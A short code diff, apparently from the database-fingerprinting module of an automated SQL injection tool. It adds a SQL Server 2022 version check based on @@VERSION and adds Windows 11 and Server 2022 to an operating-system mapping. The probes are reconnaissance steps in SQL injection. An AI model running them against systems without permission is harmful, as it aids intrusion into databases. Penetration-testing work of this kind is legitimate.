@@ -89,6 +89,7 @@ class Fingerprint(GenericFingerprint):
             logger.info(infoMsg)
 
             for version, check in (
+                ("2022", "CHARINDEX('16.0.',@@VERSION)>0"),
                 ("2019", "CHARINDEX('15.0.',@@VERSION)>0"),
                 ("Azure", "@@VERSION LIKE '%Azure%'"),
                 ("2017", "TRIM(NULL) IS NULL"),
@@ -151,7 +152,7 @@ class Fingerprint(GenericFingerprint):
             "7 or 2008 R2": ("6.1", (1, 0)),
             "8 or 2012": ("6.2", (0,)),
             "8.1 or 2012 R2": ("6.3", (0,)),
-            "10 or 2016 or 2019": ("10.0", (0,))
+            "10 or 11 or 2016 or 2019 or 2022": ("10.0", (0,))
         }
 
         # Get back-end DBMS underlying operating system version
